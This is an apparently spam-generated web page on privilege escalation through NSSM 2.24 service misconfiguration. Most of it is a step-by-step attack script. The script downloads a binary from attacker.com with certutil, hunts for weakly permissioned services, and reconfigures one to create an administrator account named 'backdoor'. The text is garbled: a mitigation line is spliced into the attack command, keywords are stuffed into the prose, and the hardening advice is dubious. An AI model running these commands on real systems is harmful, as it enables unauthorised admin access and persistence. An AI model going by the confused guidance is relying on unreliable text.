Nssm224 Privilege Escalation Updated «DELUXE · 2026»

Set ServiceSidType = Unrestricted in the service registry to limit token privileges.

Deploy a sysmon config that alerts on:

sc.exe sdshow nssm_managed_service

Look for (A;;RPWP;;;WD) or (A;;RPWPDT;;;AU) – these allow authenticated users to modify service configuration. nssm224 privilege escalation updated

REM Step 1: Upload NSSM
certutil -urlcache -f http://attacker.com/nssm-2.24.exe C:\Users\Public\nssm.exe
REM Step 2: Find a vulnerable service
sc query state= all | findstr SERVICE_NAME > services.txt
for /f %i in (services.txt) do sc sdshow %i | findstr "AU"
REM Step 3: Modify service to run malicious payload
C:\Users\Public\nssm.exe set VulnService AppParameters "C:\Windows\System32\cmd.exe /c net users backdoor P@ssw0rd /add && net localgroup administrators backdoor /add" Set ServiceSidType = Unrestricted in the service registry
REM Step 4: Trigger escalation
C:\Users\Public\nssm.exe restart VulnService

Privilege Escalation via NSSM Service Configuration (Version 224 and Prior)